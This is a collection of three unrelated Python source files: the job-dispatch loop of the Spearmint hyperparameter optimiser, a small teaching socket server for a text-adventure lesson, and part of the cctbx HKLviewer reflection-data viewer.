parser.add_option("-w", "--web-status", action="store_true",
help="Serve an experiment status web page.",
dest="web_status")
parser.add_option("--port",
help="Specify a port to use for the status web interface.",
dest="web_status_port", type="int", default=0)
parser.add_option("--host",
help="Specify a host to use for the status web interface.",
dest="web_status_host", type="string", default=None)
parser.add_option("-v", "--verbose", action="store_true",
help="Print verbose debug output.")
(options, args) = parser.parse_args()
if len(args) == 0:
parser.print_help()
sys.exit(0)
return options, args
def get_available_port(portnum):
if portnum:
return portnum
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', portnum))
port = sock.getsockname()[1]
sock.close()
return port
def start_web_view(options, experiment_config, chooser):
'''Start the web view in a separate process.'''
from spearmint.web.app import app
port = get_available_port(options.web_status_port)
print "Using port: " + str(port)
if options.web_status_host:
print "Listening at: " + str(options.web_status_host)
app.set_experiment_config(experiment_config)
app.set_chooser(options.chooser_module,chooser)
debug = (options.verbose == True)
start_web_app = lambda: app.run(debug=debug, port=port, host=options.web_status_host)
proc = multiprocessing.Process(target=start_web_app)
proc.start()
return proc
def main():
global web_proc
(options, args) = parse_args()
if options.job:
job_runner(load_job(options.job))
exit(0)
experiment_config = args[0]
expt_dir = os.path.dirname(os.path.realpath(experiment_config))
log("Using experiment configuration: " + experiment_config)
log("experiment dir: " + expt_dir)
if not os.path.exists(expt_dir):
log("Cannot find experiment directory '%s'. "
"Aborting." % (expt_dir))
sys.exit(-1)
check_experiment_dirs(expt_dir)
# Load up the chooser module.
module = importlib.import_module('chooser.' + options.chooser_module)
chooser = module.init(expt_dir, options.chooser_args)
if options.web_status:
web_proc = start_web_view(options, experiment_config, chooser)
# Load up the job execution driver.
module = importlib.import_module('driver.' + options.driver)
driver = module.init()
# Loop until we run out of jobs.
while attempt_dispatch(experiment_config, expt_dir, chooser, driver, options):
# This is polling frequency. A higher frequency means that the algorithm
# picks up results more quickly after they finish, but also significantly
# increases overhead.
time.sleep(options.polling_time)
# TODO:
# * move check_pending_jobs out of ExperimentGrid, and implement two simple
# driver classes to handle local execution and SGE execution.
# * take cmdline engine arg into account, and submit job accordingly
def attempt_dispatch(expt_config, expt_dir, chooser, driver, options):
log("\n" + "-" * 40)
expt = load_experiment(expt_config)
# Build the experiment grid.
expt_grid = ExperimentGrid(expt_dir,
expt.variable,
options.grid_size,
options.grid_seed)
# Print out the current best function value.
best_val, best_job = expt_grid.get_best()
if best_job >= 0:
log("Current best: %f (job %d)" % (best_val, best_job))
else:
log("Current best: No results returned yet.")
# Gets you everything - NaN for unknown values & durations.
grid, values, durations = expt_grid.get_grid()
# Returns lists of indices.
candidates = expt_grid.get_candidates()
pending = expt_grid.get_pending()
complete = expt_grid.get_complete()
n_candidates = candidates.shape[0]
n_pending = pending.shape[0]
n_complete = complete.shape[0]
log("%d candidates %d pending %d complete" %
(n_candidates, n_pending, n_complete))
# Verify that pending jobs are actually running, and add them back to the
# candidate set if they have crashed or gotten lost.
for job_id in pending:
proc_id = expt_grid.get_proc_id(job_id)
if not driver.is_proc_alive(job_id, proc_id):
log("Set job %d back to pending status." % (job_id))
expt_grid.set_candidate(job_id)
# Track the time series of optimization.
write_trace(expt_dir, best_val, best_job, n_candidates, n_pending, n_complete)
# Print out the best job results
write_best_job(expt_dir, best_val, best_job, expt_grid)
if n_complete >= options.max_finished_jobs:
log("Maximum number of finished jobs (%d) reached."
"Exiting" % options.max_finished_jobs)
return False
if n_candidates == 0:
log("There are no candidates left. Exiting.")
return False
if n_pending >= options.max_concurrent:
log("Maximum number of jobs (%d) pending." % (options.max_concurrent))
return True
else:
# start a bunch of candidate jobs if possible
#to_start = min(options.max_concurrent - n_pending, n_candidates)
#log("Trying to start %d jobs" % (to_start))
#for i in xrange(to_start):
# Ask the chooser to pick the next candidate
log("Choosing next candidate... ")
job_id = chooser.next(grid, values, durations, candidates, pending, complete)
# If the job_id is a tuple, then the chooser picked a new job.
# We have to add this to our grid
if isinstance(job_id, tuple):
(job_id, candidate) = job_id
job_id = expt_grid.add_to_grid(candidate)
log("selected job %d from the grid." % (job_id))
# Convert this back into an interpretable job and add metadata.
job = Job()
job.id = job_id
job.expt_dir = expt_dir
job.name = expt.name
job.language = expt.language
job.status = 'submitted'
job.submit_t = int(time.time())
job.param.extend(expt_grid.get_params(job_id))
save_job(job)
pid = driver.submit_job(job)
if pid != None:
log("submitted - pid = %d" % (pid))
expt_grid.set_submitted(job_id, pid)
else:
log("Failed to submit job!")
log("Deleting job file.")
os.unlink(job_file_for(job))
return True
def write_trace(expt_dir, best_val, best_job,
n_candidates, n_pending, n_complete):
'''Append current experiment state to trace file.'''
trace_fh = open(os.path.join(expt_dir, 'trace.csv'), 'a')
trace_fh.write("%d,%f,%d,%d,%d,%d\n"
% (time.time(), best_val, best_job,
n_candidates, n_pending, n_complete))
trace_fh.close()
def write_best_job(expt_dir, best_val, best_job, expt_grid):
'''Write out the best_job_and_result.txt file containing the top results.'''
best_job_fh = open(os.path.join(expt_dir, 'best_job_and_result.txt'), 'w')
best_job_fh.write("Best result: %f\nJob-id: %d\nParameters: \n" %
(best_val, best_job))
for best_params in expt_grid.get_params(best_job):
best_job_fh.write(str(best_params))
best_job_fh.close()
def check_experiment_dirs(expt_dir):
'''Make output and jobs sub directories.'''
output_subdir = os.path.join(expt_dir, 'output')
check_dir(output_subdir)
job_subdir = os.path.join(expt_dir, 'jobs')
check_dir(job_subdir)
# Cleanup locks and processes on ctl-c
def sigint_handler(signal, frame):
if web_proc:
print "closing web server...",
web_proc.terminate()
print "done"
sys.exit(0)
if __name__=='__main__':
print "setting up signal handler..."
signal.signal(signal.SIGINT, sigint_handler)
main()
|
server_v12.py
|
import socket
from threading import Thread
from lesson12.states.out import OutState
from lesson12_projects.house3.data.state_gen import house3_state_gen
from lesson12_projects.house3.data.const import OUT
class ServerV12:
def __init__(self, transition_doc, host="0.0.0.0", port=5002, message_size=1024):
"""初期化
Parameters
----------
host : str
サーバーのIPアドレス。 規定値 "0.0.0.0"
port : int
サーバー側のポート番号。 規定値 5002
message_size : int
1回の通信で送れるバイト長。 規定値 1024
"""
self._host = host
self._port = port
self._message_size = message_size
# '_s_sock' - (Server socket) the TCP socket of this server
self._s_sock = None
# '_c_sock_set' - (Client socket set) the set of sockets of clients that have connected to this server
self._c_sock_set = None
self._transition_doc = transition_doc
def run(self):
def client_worker(c_sock):
"""クライアントから送信されてくるバイナリデータに対応します
Parameters
----------
c_sock : socket
接続しているクライアントのソケット
"""
c_sock.send(
"""Welcome to Lesson 12 !
----------------------
You can see the house.
You can see the close knob.""".encode()
)
# Initially we are outside
state_name = OUT
state = OutState()
while True:
try:
# Convert the binary data received from the client into text
message = c_sock.recv(self._message_size).decode()
# Perform the action for this message, then return an edge name
edge_name = state.update(message, c_sock)
# Map the edge name to the next state name
state_name = self._transition_doc['data'][state_name][edge_name]
# Instantiate the state object from the state name
state = house3_state_gen[state_name]()
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
print(f"Remove a socket")
self._c_sock_set.remove(c_sock)
break
self._c_sock_set = set() # initialize
s_sock = socket.socket() # configure this server's TCP socket
# make the port as reusable port
s_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind the host and port number
s_sock.bind((self._host, self._port))
# Upper limit on the number of simultaneous client connections
s_sock.listen(5)
self._s_sock = s_sock
print(f"[*] Listening as {self._host}:{self._port}")
# Loop that keeps waiting for client connections
while True:
print(f"Wait a connection")
# Block here until a client connects
# 'c_sock' - Client socket
# 'c_addr' - Client address
c_sock, c_addr = self._s_sock.accept()
print(f"[+] {c_addr} connected.")
# Remember the client connection
self._c_sock_set.add(c_sock)
# Start a separate thread
thr = Thread(target=client_worker, args=(c_sock,))
# make the thread daemon so it ends whenever the main thread ends
thr.daemon = True
# start the thread
thr.start()
def clean_up(self):
# Close the client sockets
print("Clean up")
if not (self._c_sock_set is None):
for c_sock in self._c_sock_set:
c_sock.close()
# Also close the server socket
if not (self._s_sock is None):
self._s_sock.close()
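# A minimal interactive client sketch (illustration only; it belongs in a separate
# script): the server listens on port 5002 and exchanges plain text messages of at most
# message_size bytes, so something as simple as the following (or `telnet <host> 5002`)
# can talk to it. The commands actually understood depend on the state classes imported above.
#
#     import socket
#     c = socket.socket()
#     c.connect(("127.0.0.1", 5002))
#     print(c.recv(1024).decode())      # welcome text sent by client_worker()
#     c.send("look".encode())           # hypothetical command
#     print(c.recv(1024).decode())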
|
cmdlineframes.py
|
from __future__ import absolute_import, division, print_function
from iotbx.reflection_file_reader import any_reflection_file
from cctbx.miller import display2 as display
from crys3d.hklviewer import jsview_3d as view_3d
from crys3d.hklviewer.jsview_3d import ArrayInfo
from cctbx import miller
from libtbx.math_utils import roundoff
from libtbx.str_utils import format_value
from cctbx.array_family import flex
from libtbx.utils import Sorry, to_str
from scitbx import matrix
from cctbx import sgtbx
from libtbx import group_args, version
import libtbx
import libtbx.load_env
import traceback
import sys, zmq, threading, time, cmath, zlib, os.path, math, re
NOREFLDATA = "No reflection data has been selected"
class settings_window () :
def set_index_span (self, index_span) :
self._index_span = index_span
def update_reflection_info (self, hkl, d_min, value) :
print(hkl, value)
if (hkl is None) :
self.hkl_info.SetValue("")
self.d_min_info.SetValue("")
self.value_info.SetValue("")
else :
self.hkl_info.SetValue("%d, %d, %d" % hkl)
d_min_str = format_value("%.3g", d_min)
self.d_min_info.SetValue(d_min_str)
value_str = format_value("%.3g", value, replace_none_with="---")
self.value_info.SetValue(value_str)
def clear_reflection_info (self) :
self.update_reflection_info(None, None, None)
class HKLViewFrame() :
def __init__ (self, *args, **kwds) :
self.valid_arrays = []
self.spacegroup_choices = []
self.procarrays = []
self.origarrays = {}
self.merge_answer = [None]
self.dmin = -1
self.settings = display.settings()
self.verbose = 0
if 'verbose' in kwds:
self.verbose = eval(kwds['verbose'])
self.guiSocketPort=None
kwds['settings'] = self.settings
kwds['mprint'] = self.mprint
self.infostr = ""
self.hklfile_history = []
self.tncsvec = None
self.uservectors = []
self.new_miller_array_operations_lst = []
self.copyrightpaths = [("CCTBX copyright", libtbx.env.under_root(os.path.join("modules","cctbx_project","COPYRIGHT.txt"))),
("NGL copyright", libtbx.env.under_dist("crys3d","hklviewer/License_for_NGL.txt")),
("html2canvas copyright", libtbx.env.under_dist("crys3d","hklviewer/LICENSE_for_html2canvas.txt"))
]
self.zmqsleeptime = 0.1
if 'useGuiSocket' in kwds:
self.guiSocketPort = eval(kwds['useGuiSocket'])
self.context = zmq.Context()
self.guisocket = self.context.socket(zmq.PAIR)
self.guisocket.connect("tcp://127.0.0.1:%s" %self.guiSocketPort )
self.STOP = False
self.mprint("CCTBX starting socket thread", 1)
# name this thread to ensure any asyncio functions are called only from main thread
self.msgqueuethrd = threading.Thread(target = self.zmq_listen, name="HKLviewerZmqThread" )
self.msgqueuethrd.daemon = True
kwds['send_info_to_gui'] = self.SendInfoToGUI # function also used by hklview_3d
pyversion = "cctbx.python.version: " + str(sys.version_info[0])
# tell gui what python version we are
self.SendInfoToGUI(pyversion )
self.SendInfoToGUI({"copyrights": self.copyrightpaths,
"cctbxversion": version.get_version()} )
self.mprint("kwds= " +str(kwds), 1)
self.mprint("args= " + str(args), 1)
kwds['websockport'] = self.find_free_port()
kwds['parent'] = self
self.viewer = view_3d.hklview_3d( **kwds )
self.ResetPhilandViewer()
self.idx_data = None
self.NewFileLoaded = False
self.loaded_file_name = ""
self.hklin = None
if 'hklin' in kwds or 'HKLIN' in kwds:
self.hklin = kwds.get('hklin', kwds.get('HKLIN') )
self.LoadReflectionsFile(self.hklin)
if 'useGuiSocket' in kwds:
self.msgqueuethrd.start()
def __exit__(self, exc_type=None, exc_value=0, traceback=None):
self.viewer.__exit__(exc_type, exc_value, traceback)
self.mprint("Destroying HKLViewFrame", verbose=0) # this string is expected by HKLviewer.py so don't change
self.STOP = True
del self
#sys.exit()
def mprint(self, msg, verbose=0):
if verbose <= self.verbose:
if self.guiSocketPort:
self.SendInfoToGUI( { "info": msg } )
else:
print(msg)
def find_free_port(self):
import socket
s = socket.socket()
s.bind(('', 0)) # Bind to a free port provided by the host.
port = s.getsockname()[1]
s.close()
return port
def zmq_listen(self):
#time.sleep(5)
while not self.STOP:
try:
msgstr = self.guisocket.recv().decode("utf-8")
if msgstr == "":
continue
self.mprint("Received string:\n" + msgstr, verbose=1)
msgtype, mstr = eval(msgstr)
if msgtype=="dict":
self.viewer.datatypedict = eval(mstr)
if msgtype=="philstr":
new_phil = libtbx.phil.parse(mstr)
self.update_settings(new_phil)
time.sleep(self.zmqsleeptime)
except Exception as e:
self.mprint( str(e) + traceback.format_exc(limit=10), verbose=1)
self.mprint( "Shutting down zmq_listen() thread", 1)
self.guiSocketPort=None
def ResetPhilandViewer(self, extraphil=None):
self.master_phil = libtbx.phil.parse( masterphilstr )
self.currentphil = self.master_phil
if extraphil:
self.currentphil = self.currentphil.fetch(source = extraphil)
# Don't retain clip plane values as these are specific to each crystal
# so use clip plane parameters from the master phil
default_clipphil = self.master_phil.fetch().extract().clip_plane
currentparms = self.currentphil.extract()
currentparms.clip_plane = default_clipphil
self.currentphil = self.master_phil.format(python_object = currentparms)
self.params = self.currentphil.fetch().extract()
self.viewer.viewerparams = self.params.viewer
self.viewer.params = self.params
self.params.binner_idx = 0
self.params.nbins = 1
self.params.scene_bin_thresholds = ""
self.params.using_space_subgroup = False
self.viewer.symops = []
self.viewer.sg = None
self.viewer.proc_arrays = []
self.viewer.HKLscenedict = {}
self.uservectors = []
self.viewer.visual_symmxs = []
self.visual_symHKLs = []
self.viewer.sceneisdirty = True
self.viewer.isnewfile = True
if self.viewer.miller_array:
self.viewer.params.viewer.scene_id = None
self.viewer.RemoveStageObjects()
self.viewer.miller_array = None
self.viewer.lastviewmtrx = None
return self.viewer.params
def GetNewCurrentPhilFromString(self, philstr, oldcurrentphil):
user_phil = libtbx.phil.parse(philstr)
newcurrentphil = oldcurrentphil.fetch(source = user_phil)
diffphil = oldcurrentphil.fetch_diff(source = user_phil)
return newcurrentphil, diffphil
def GetNewCurrentPhilFromPython(self, pyphilobj, oldcurrentphil):
newcurrentphil, unusedphilparms = oldcurrentphil.fetch(source = pyphilobj, track_unused_definitions=True)
for parm in unusedphilparms:
self.mprint( "Received unrecognised phil parameter: " + parm.path, verbose=1)
diffphil = oldcurrentphil.fetch_diff(source = pyphilobj)
"""
oldcolbintrshld = oldcurrentphil.extract().scene_bin_thresholds
newcolbintrshld = oldcolbintrshld
if hasattr(pyphilobj.extract(), "scene_bin_thresholds"):
newcolbintrshld = pyphilobj.extract().scene_bin_thresholds
# fetch_diff doesn't seem able to correctly spot changes
# in the multiple scope phil object "scene_bin_thresholds"
# Must do it manually
params = newcurrentphil.extract()
if oldcolbintrshld != newcolbintrshld: # or old_binopacities != new_binopacities:
params.scene_bin_thresholds = newcolbintrshld
newcurrentphil = self.master_phil.format(python_object = params)
diffphil = self.master_phil.fetch_diff(source = newcurrentphil)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
"""
return newcurrentphil, diffphil
def SetCurrentPhilAsPython(self, pyphil):
newphil = self.master_phil.format(python_object= pyphil)
currphil = self.master_phil.fetch(source = newphil)
def update_settings(self, new_phil=None):
try:
if not new_phil:
#self.params = self.viewer.params
new_phil = self.master_phil.format(python_object = self.params)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.currentphil, diff_phil = self.GetNewCurrentPhilFromPython(new_phil, self.currentphil)
#diff = None
self.params = self.currentphil.extract()
phl = self.params
if len(diff_phil.all_definitions()) < 1 and not phl.mouse_moved:
self.mprint( "Nothing's changed", verbose=1)
return False
#diff = diff_phil.extract()
self.mprint("diff phil:\n" + diff_phil.as_str(), verbose=1 )
#self.params = self.currentphil.extract()
#phl = self.params
if view_3d.has_phil_path(diff_phil, "use_provided_miller_arrays"):
phl = self.ResetPhilandViewer(self.currentphil)
if not self.load_miller_arrays():
return False
self.viewer.lastscene_id = phl.viewer.scene_id
if view_3d.has_phil_path(diff_phil, "openfilename"):
phl = self.ResetPhilandViewer(self.currentphil)
if not self.load_reflections_file(phl.openfilename):
return False
self.viewer.lastscene_id = phl.viewer.scene_id
if view_3d.has_phil_path(diff_phil, "scene_id", "merge_data", "show_missing", \
"show_only_missing", "show_systematic_absences", "nbins", "binner_idx",\
"scene_bin_thresholds"):
if self.set_scene(phl.viewer.scene_id):
self.update_space_group_choices()
self.set_scene_bin_thresholds(strbinvals=phl.scene_bin_thresholds,
binner_idx=phl.binner_idx,
nbins=phl.nbins )
if phl.spacegroup_choice == None:
self.mprint("! spacegroup_choice == None")
#time.sleep(15)
if view_3d.has_phil_path(diff_phil, "spacegroup_choice"):
self.set_spacegroup_choice(phl.spacegroup_choice)
if view_3d.has_phil_path(diff_phil, "tabulate_miller_array_ids"):
self.tabulate_arrays(phl.tabulate_miller_array_ids)
#return True
if view_3d.has_phil_path(diff_phil, "miller_array_operations"):
self.make_new_miller_array()
if view_3d.has_phil_path(diff_phil, "using_space_subgroup") and phl.using_space_subgroup==False:
self.set_default_spacegroup()
if view_3d.has_phil_path(diff_phil, "shape_primitive"):
self.set_shape_primitive(phl.shape_primitive)
if view_3d.has_phil_path(diff_phil, "add_user_vector_hkl_op",
"add_user_vector_abc",
"add_user_vector_hkl"):
self.add_user_vector()
if view_3d.has_phil_path(diff_phil, "save_image_name"):
self.SaveImageName(phl.save_image_name)
phl.save_image_name = None
if view_3d.has_phil_path(diff_phil, "action"):
ret = self.set_action(phl.action)
phl.action = "is_running" # ensure the same action in succession can be executed
if not ret:
return False
if view_3d.has_phil_path(diff_phil, "savefilename"):
self.SaveReflectionsFile(phl.savefilename)
phl.savefilename = None # ensure the same action in succession can be executed
if view_3d.has_phil_path(diff_phil, "viewer"):
self.viewer.settings = phl.viewer
self.settings = phl.viewer
self.params = self.viewer.update_settings(diff_phil, phl)
if view_3d.has_phil_path(diff_phil, "scene_id", "spacegroup_choice"):
self.list_vectors()
# parameters might have been changed. So update self.currentphil accordingly
self.currentphil = self.master_phil.format(python_object = self.params)
self.NewFileLoaded = False
phl.mouse_moved = False
self.SendCurrentPhilValues()
if (self.viewer.miller_array is None) :
self.mprint( NOREFLDATA, True)
return False
return True
except Exception as e:
self.mprint(to_str(e) + "\n" + traceback.format_exc(), 0)
return False
def update_clicked (self, index) :#hkl, d_min=None, value=None) :
if (index is None) :
self.settings_panel.clear_reflection_info()
else :
hkl, d_min, value = self.viewer.scene.get_reflection_info(index)
self.settings_panel.update_reflection_info(hkl, d_min, value)
def detect_Rfree(self, array):
from iotbx.reflection_file_utils import looks_like_r_free_flags_info
info = array.info()
if (array.is_integer_array()) and (looks_like_r_free_flags_info(info)) :
from iotbx.reflection_file_utils import get_r_free_flags_scores
score_array = get_r_free_flags_scores([array], None)
test_flag_value = score_array.test_flag_values[0]
if test_flag_value not in array.data():
return array # for the few cases where a miller array cannot be considered as a valid Rfree array
array = array.customized_copy(data=(array.data() == test_flag_value))
array.set_info(info)
array._data = array.data().as_int()
return array
def process_miller_array(self, array) :
if (array is None) : return
info = array.info()
if isinstance(info, str) :
labels = "TEST DATA"
else :
labels = info.label_string()
if (array.unit_cell() is None) or (array.space_group() is None) :
raise Sorry("No space group info is present in data")
details = []
self.infostr = ""
array = self.detect_Rfree(array)
sg = "%s" % array.space_group_info()
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % array.unit_cell().parameters()
details_str = ""
if (len(details) > 0) :
details_str = "(%s)" % ", ".join(details)
array_info = group_args(
labels=labels,
details_str=details_str,
merge=self.params.merge_data,
sg=sg,
uc=uc)
return array, array_info
def process_all_miller_arrays(self, col):
self.mprint("Processing reflection data...")
self.procarrays = []
if self.params.merge_data == False:
self.settings.expand_to_p1 = False
self.settings.expand_anomalous = False
for c,arr in enumerate(self.valid_arrays):
procarray, procarray_info = self.process_miller_array(arr)
self.procarrays.append(procarray)
if c==col:
array_info = procarray_info
self.viewer.miller_array = procarray
if col is None:
array_info = procarray_info
return array_info
def set_miller_array(self, col=None) :
if col is not None and col >= len(self.viewer.hkl_scenes_info ):
return
array_info = self.process_all_miller_arrays(col)
self.viewer.set_miller_array(col, merge=array_info.merge,
details=array_info.details_str)
self.viewer.proc_arrays = self.procarrays
self.viewer.identify_suitable_fomsarrays()
def update_space_group_choices(self, col=None) :
if (self.viewer.miller_array is None and col is None) or \
self.params.using_space_subgroup:
return
if col is None:
current_miller_array_idx = self.viewer.HKLInfo_from_dict()[1]
else:
current_miller_array_idx = col
matching_valid_array = self.procarrays[ current_miller_array_idx ]
from cctbx.sgtbx.subgroups import subgroups
from cctbx import sgtbx
sg_info = matching_valid_array.space_group_info()
subgrs = subgroups(sg_info).groups_parent_setting()
self.spacegroup_choices = []
for i,subgroup in enumerate(subgrs) :
subgroup_info = sgtbx.space_group_info(group=subgroup)
self.spacegroup_choices.append(subgroup_info)
for i,e in enumerate(self.spacegroup_choices):
c = None
if str(sg_info) == str(e):
self.current_spacegroup = self.spacegroup_choices[i]
c = i
break
if c is None:
c = 0
self.spacegroup_choices.insert(c, sg_info)
self.current_spacegroup = sg_info
self.params.spacegroup_choice = c
spglst = [e.symbol_and_number() for e in self.spacegroup_choices] + ["original spacegroup"]
mydict = { "spacegroups": spglst }
self.SendInfoToGUI(mydict)
def set_spacegroup_choice(self, n) :
if (self.viewer.miller_array is None) :
raise Sorry("No data loaded!")
if n == len(self.spacegroup_choices): # selected the unmerged "original spacegroup" in the list
self.viewer.proc_arrays = self.procarrays
self.params.using_space_subgroup = False
else:
self.current_spacegroup = self.spacegroup_choices[n]
from cctbx import crystal
symm = crystal.symmetry(
space_group_info= self.current_spacegroup,
unit_cell=self.viewer.miller_array.unit_cell())
othervalidarrays = []
for validarray in self.procarrays:
# TODO: check if array is unmerged i.e. not symmetry unique
arr = validarray.expand_to_p1().customized_copy(crystal_symmetry=symm)
arr = arr.merge_equivalents().array().set_info(validarray.info())
arr = self.detect_Rfree(arr)
othervalidarrays.append( arr )
self.mprint( "MERGING 2", verbose=2)
self.viewer.proc_arrays = othervalidarrays
self.params.using_space_subgroup = True
self.viewer.set_miller_array()
for i,e in enumerate(self.spacegroup_choices):
self.mprint("%d, %s" %(i,e.symbol_and_number()) , verbose=0)
def SetSpaceGroupChoice(self, n):
self.params.spacegroup_choice = n
self.update_settings()
def SetDefaultSpaceGroup(self):
self.params.using_space_subgroup = False
self.update_settings()
def set_default_spacegroup(self):
self.viewer.proc_arrays = self.procarrays
self.viewer.set_miller_array()
self.viewer.identify_suitable_fomsarrays()
def MakeNewMillerArrayFrom(self, operation, label, arrid1, arrid2=None):
# get list of existing new miller arrays and operations if present
miller_array_operations_lst = []
#if self.params.miller_array_operations:
# miller_array_operations_lst = eval(self.params.miller_array_operations)
miller_array_operations_lst = [ ( operation, label, arrid1, arrid2 ) ]
self.params.miller_array_operations = str( miller_array_operations_lst )
self.update_settings()
def make_new_miller_array(self):
miller_array_operations_lst = eval(self.params.miller_array_operations)
unique_miller_array_operations_lst = []
for (operation, label, arrid1, arrid2) in miller_array_operations_lst:
for arr in self.procarrays:
if label in arr.info().labels + [ "", None]:
raise Sorry("Provide an unambiguous label for your new miller array!")
unique_miller_array_operations_lst.append( (operation, label, arrid1, arrid2) )
self.params.miller_array_operations = str(unique_miller_array_operations_lst)
from copy import deepcopy
millarr1 = deepcopy(self.procarrays[arrid1])
newarray = None
if arrid2 != -1:
millarr2 = deepcopy(self.procarrays[arrid2])
newarray = self.viewer.OperateOn2MillerArrays(millarr1, millarr2, operation)
else:
newarray = self.viewer.OperateOn1MillerArray(millarr1, operation)
if newarray is not None:
self.mprint("New dataset has %d reflections." %newarray.size())
newarray.set_info(millarr1._info )
newarray._info.labels = [ label ]
procarray, procarray_info = self.process_miller_array(newarray)
self.procarrays.append(procarray)
self.viewer.proc_arrays = self.procarrays
self.viewer.has_new_miller_array = True
self.viewer.array_infostrs.append( ArrayInfo(procarray, self.mprint).infostr )
self.viewer.array_infotpls.append( ArrayInfo(procarray, self.mprint).infotpl )
#self.viewer.SupersetMillerArrays()
hkls = self.origarrays["HKLs"]
nanarr = flex.double(len(hkls), float("nan"))
m = miller.match_indices(hkls, procarray.indices() )
indices_of_matched_hkls = m.pairs().column(0)
for i,e in enumerate(indices_of_matched_hkls):
nanarr[e] = procarray.data()[i]
self.origarrays[label] = list(nanarr)
mydict = { "array_infotpls": self.viewer.array_infotpls,
"NewHKLscenes" : True,
"NewMillerArray" : True
}
self.SendInfoToGUI(mydict)
def prepare_dataloading(self):
self.viewer.isnewfile = True
#self.params.mergedata = None
self.params.viewer.scene_id = None
self.viewer.colour_scene_id = None
self.viewer.radii_scene_id = None
self.viewer.match_valarrays = []
self.viewer.proc_arrays = {}
self.spacegroup_choices = []
self.origarrays = {}
display.reset_settings()
self.settings = display.settings()
self.viewer.settings = self.params.viewer
self.viewer.mapcoef_fom_dict = {}
self.viewer.sceneid_from_arrayid = []
self.hklfile_history = []
self.tncsvec = None
self.loaded_file_name = ""
def finish_dataloading(self, arrays):
valid_arrays = []
self.viewer.array_infostrs = []
self.viewer.array_infotpls = []
spg = arrays[0].space_group()
uc = arrays[0].unit_cell()
for i,array in enumerate(arrays):
if type(array.data()) == flex.std_string: # in case of status array from a cif file
uniquestrings = list(set(array.data()))
info = array.info()
array = array.customized_copy(data=flex.int([uniquestrings.index(d) for d in array.data()]))
array.set_info(info)
if array.space_group() is None:
array._unit_cell = uc
array._space_group_info = spg.info()
self.mprint("""No unit cell or space group info present in the %d. miller array.
Borrowing them from the first miller array""" %i)
arrayinfo = ArrayInfo(array, self.mprint)
self.viewer.array_infostrs.append( arrayinfo.infostr )
self.viewer.array_infotpls.append( arrayinfo.infotpl )
if i==0:
mydict = { "spacegroup_info": arrayinfo.spginf, "unitcell_info": arrayinfo.ucellinf }
self.SendInfoToGUI(mydict)
valid_arrays.append(array)
self.valid_arrays = valid_arrays
self.mprint("%d Miller arrays in this dataset:" %len(arrays))
for e in self.viewer.array_infostrs:
self.mprint("%s" %e)
self.mprint("\n")
self.NewFileLoaded = True
if (len(valid_arrays) == 0):
msg = "No arrays of the supported types present."
self.mprint(msg)
self.NewFileLoaded=False
elif (len(valid_arrays) >= 1):
self.set_miller_array()
self.update_space_group_choices(0) # get the default spacegroup choice
mydict = { "info": self.infostr,
"array_infotpls": self.viewer.array_infotpls,
"bin_infotpls": self.viewer.bin_infotpls,
"html_url": self.viewer.url,
"tncsvec": self.tncsvec,
"merge_data": self.params.merge_data,
"spacegroups": [e.symbol_and_number() for e in self.spacegroup_choices],
"NewFileLoaded": self.NewFileLoaded,
"file_name": self.params.openfilename
}
self.SendInfoToGUI(mydict)
self.params.openfilename = None
def load_reflections_file(self, file_name):
file_name = to_str(file_name)
ret = False
if (file_name != ""):
try :
self.mprint("Reading file...")
self.prepare_dataloading()
hkl_file = any_reflection_file(file_name)
if hkl_file._file_type == 'cif':
# use new cif label parser for reflections
cifreader = hkl_file.file_content()
cifarrays = cifreader.as_miller_arrays(merge_equivalents=False)
arrays = []
for arr in cifarrays:
if arr.info().labels[-1] not in ['_refln.crystal_id', # avoid these un-displayable arrays
'HKLs','_refln.wavelength_id', '_refln.scale_group_code']:
arrays.append(arr)
# sanitise labels by removing redundant strings.
# remove the data name of this cif file from all labels
dataname = list(hkl_file._file_content.builder._model.keys())
unwantedstrings = dataname[:]
# remove "_refln." from all labels
unwantedstrings.append("_refln.")
unwantedstrings.append("_refln_")
for arr in arrays:
if len(arr.info().labels):
newlabels = []
for label in arr.info().labels:
found = False
for s in unwantedstrings:
if s in label:
newlabel = label.replace(s, "")
found = True
if len(newlabel) > 0:
newlabels.append(newlabel)
break
if not found:
newlabels.append(label)
arr.info().labels = newlabels
ciforigarrays = cifreader.as_original_arrays()[dataname[0]]
self.origarrays = {}
for key in ciforigarrays:
if key not in ['_refln.crystal_id', # avoid these un-displayable arrays
'_refln.wavelength_id', '_refln.scale_group_code']:
self.origarrays[key] = ciforigarrays[key]
# replace ? with nan in self.origarrays to allow sorting tables of data in HKLviewer
for labl in self.origarrays.keys():
origarray = self.origarrays[labl]
for i,e in enumerate(self.origarrays[labl]):
if e=="?":
origarray[i] = "nan"
try:
self.origarrays[labl] = flex.double(origarray)
except Exception as e:
self.origarrays[labl] = origarray
else: # some other type of reflection file than cif
arrays = hkl_file.as_miller_arrays(merge_equivalents=False)
if hkl_file._file_type == 'ccp4_mtz':
self.hklfile_history = list(hkl_file._file_content.history())
self.loaded_file_name = file_name
for e in self.hklfile_history:
if "TNCS NMOL" in e and "VECTOR" in e:
svec = e.split()[-3:]
t1 = float(svec[0])
t2 = float(svec[1])
t3 = float(svec[2])
if (t1*t1 + t2*t2 + t3*t3) > 0.0:
self.tncsvec = (t1, t2, t3)
self.mprint("tNCS vector found in header of mtz file: %s" %str(self.tncsvec) )
from iotbx import mtz
mtzobj = mtz.object(file_name)
nanval = float("nan")
self.origarrays["HKLs"] = mtzobj.extract_miller_indices()
for mtzlbl in mtzobj.column_labels():
col = mtzobj.get_column( mtzlbl )
newarr = col.extract_values_and_selection_valid().values.deep_copy()
for i,b in enumerate(col.extract_values_and_selection_valid().selection_valid):
if not b:
newarr[i] = nanval
self.origarrays[mtzlbl] = list(newarr)
self.finish_dataloading(arrays)
except Exception as e :
self.NewFileLoaded=False
self.mprint("".join(traceback.format_tb(e.__traceback__ )) + e.__repr__())
arrays = []
ret = True
return ret
def LoadReflectionsFile(self, openfilename):
self.params.openfilename = openfilename
self.update_settings()
def load_miller_arrays(self):
ret = False
try:
self.ResetPhilandViewer(self.currentphil)
self.prepare_dataloading()
self.finish_dataloading(self.provided_miller_arrays)
ret = True
except Exception as e :
self.NewFileLoaded=False
